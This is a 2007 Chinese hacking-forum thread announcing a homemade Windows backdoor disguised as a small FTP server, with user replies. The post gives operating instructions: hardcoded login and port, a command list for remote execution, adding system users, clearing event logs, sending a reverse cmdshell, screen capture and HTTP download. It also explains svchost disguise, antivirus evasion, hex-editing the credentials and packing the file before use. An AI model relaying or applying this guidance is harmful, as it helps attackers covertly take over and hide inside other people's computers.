[原创]SUS迷你ftp后门
文章作者:单克隆抗体信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
注意:文章首发东南大学网络安全联盟论坛([url]www.bestseu.com/sus/[/url]),后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。
这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?
这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。
只需用任一款ftp连接工具(包括windows自带的ftp和IE),ip地址填服务端ip,端口填2100,用户名填sus,密码填sus666,确定后服务端的c:盘便立刻展现在眼前。
再看看其它的控制功能怎么实现的呢?
这里提供2种方法:
1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后,便可以输入后门控制命令,如pslist。
2.
运行ftp.exe,然后输入open <服务端ip> 2100,按照提示输入用户名sus,密码sus666便登陆进去了。除了运行传统的ftp命令外,这里还可以用quote加上马上要提到的后门控制命令,如quote pslist。
专用的后门控制命令如下,这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS's FTP BackDoor! Welcome to SUS!
Author: dklkt Date: 2007.7
######################################################################
WINEXEC <exefilepath> Using this to execute an executable file.
SHELLEXECUTE <exefilepath> The same to above.
SETHOMEDIR <ftp's homedir> Set the home directory of ftp's. Default is C:\
GETSYSINFO Get some system infomation
PSLIST List the Process on the system
PSKILL <PID> Kill a process by its pid
VIEWTERMPORT View Terminal Service's port. Default is 3389
SETTERMPORT <PortNum> Set the Terminal Service's Port.
INSTALLTERM Install Terminal Service.
CLEANEVENT Clean the system event logs.
ENUMSERVICE List all the services in the system.
STARTSERVICE <ServcieName> Start a service. Like "net start"
STOPSERVICE <ServiceName> Stop a service.
DELETESERVICE <ServiceName> Delete a service.
VIEWSERVICE <ServiceName> View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT Reboot the system.
SHUTDOWN Power off the system.
STOPBACKDOOR Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port> Send a back cmdshell. Use nc listen first
STARTSHELL <port> Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath> Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress> Download a file using http protocol.
UNINSTALL Uninstall the Ftp Backdoor!
-------------------------------------------------
Good Luck! :-)
(本人英语比较搓,大家意会便可,语法问题多多 ^_^)
比如你在telnet模式下,想运行c:\mm.exe这个程序,便输入
winexec c:\mm.exe
在ftp模式下,想添加一个系统用户,可以输入
quote shellexecute net.exe user aaa /add
在telnet模式下,想修改ftp服务的home目录位置到d:盘,可以输入
sethomedir d:\
相应的的,ftp模式下,前面加上quote
quote sethomedir d:\
另外,虽然这是测试版,但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的,2100对应的16进制是834,因为是反序的,所以你查找34 08这两个字节就可以了,大约是在第a230那一行,改成相应的就行。比如想改成21,就把它改成15 00。希望大家自己用用就好,没必要对外传播。还有最好自己加个壳再拿去做后门。
差点忘了。把特性说明下:
本后门是替换系统服务自启动的,启动后伪装成svchost进程(相似程度100%)穿透防火墙。估计一般的辅助工具不容易查出来,这里你可以使用stopbackdoor命令停止后门,用uninstall命令卸载后门。 代朋友发的,很简单,请牛人勿笑哦 codeproject有个封装很好的FTP服务器类,只需要几句代码可以实现一个FTP服务器
大家可以找找 我关系的问题是 倘若不小心中了这个东东
如何查杀? 替换什么服务,思路倒是挺好的 成功运行并开启了2100端口,但怎么我ftp和telnet都连不上呢 自定义盘符号,文件夹的,。 [s:263]
quote shellexecute net.exe user aaa /add 俺怎么不成功汗~
svchost进程 是以当前系统用户 - - 估计很容易给发现
支持~ [quote]引用第3楼ssspr于2007-08-01 17:19发表的 :
我关系的问题是 倘若不小心中了这个东东
如何查杀?[/quote]
最简单的方式,想办法删掉它就可以了。
[quote]引用第4楼inking于2007-08-01 18:12发表的 :
替换什么服务,思路倒是挺好的[/quote]
就是WmiApSrv
[quote]引用第6楼crab于2007-08-02 14:26发表的 :
svchost进程 是以当前系统用户 - - 估计很容易给发现
[/quote]
嗯,谢谢你的建议。不过目前重启后就是以SYSTEM运行的。
写这个本来是内部交流的,没什么含量。转发过来有些丢脸。高手可以pass。 发现个奇怪的问题,quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648,我改成4826,可端口成了18470。 [quote]引用第8楼wwww23于2007-08-03 07:31发表的 :
发现个奇怪的问题,quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648,我改成4826,可端口成了18470。[/quote]
9800的16进制是2648
那你改成4826干什么
4826是16进制
转成10进制当然是18470
ps:酒后禁止上论坛 [quote]引用第8楼wwww23于2007-08-03 07:31发表的 :
发现个奇怪的问题,quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648,我改成4826,可端口成了18470。[/quote]
quote help 确实有点问题,quote pslist可能也有点问题,quote getsysinfo也可能有点问题。毕竟windows的ftp.exe的目的不是用来干这个的。这些在telnet的方式都比较正常。
在ftp命令中quote的作用是将后面的参数直接发到服务器,比如quote syst实际上是把syst发到服务器。本程序正式利用了这一点,自己构造了很多命令从而实现后门。相比telnet模式,当以这种模式登陆到服务器时,输入的则直接作为命令发给服务器,比如直接输入LIST则可以列目录等。
关于端口的修改,我这里用的是UltraEdit,直接查找16进制修改的。具体问题具体分析。 XP_SP2下的测试结果,有点小问题。
当控制端运行stopbackdoor命令时,被控端的屏幕会显示三次这种结果,如图:
[img]http://www.pcg.com.cn/UploadFile/2007-8/20078417565954009.jpg[/img] 大哥, 能不能把这个程序作者的联系方式给我. 我想和他一起开发这个软件。 我现在写的后门,功能与这个太像了..
拜托....
我的联系方式: QQ: 554047943 验证: 关于SU FTP
电子邮件: [email]xionglonghui@yahoo.com.cn[/email] 楼主,想问您一个问题。这个程序所谓的替换系统服务隐身功能是不是程序本身加了EXE注入SVCHOST。EXE 的代码。
我自己测试了下,单纯的替换系统服务,不加注入代码,程序运行一下就消失了,会意外中断。
还有,之所以系统会出现用户身份的SVCHOST。EXE也是因为用了普通方式启动。把它改成服务启动即可。
希望这个程序程序的作者速与我取得联系,我在写这方面的代码。想交流交流。
我QQ: 554047943 验证信息: su ftp
电子邮件:[email]xionglonghui@yahoo.com.cn[/email] [quote]引用第6楼crab于2007-08-02 14:26发表的 :
自定义盘符号,文件夹的,。 [s:263]
quote shellexecute net.exe user aaa /add 俺怎么不成功汗~
.......[/quote]
应该是 quote site exec "net.exe user aaa /add"吧?
呵呵.我用的这个可以用.好像..~
这个后门太强悍了...而且就跟普通的FTP服务端一样..应该不会被杀毒软件干掉吧??
太无敌了.呵呵~~ 测试了一下, FTP功能好象有点问题, FLASHFXP和CUTEFTP连都是无法显示目录, 被动模式和主动模式都试了.
后门功能正常....
页:
[1]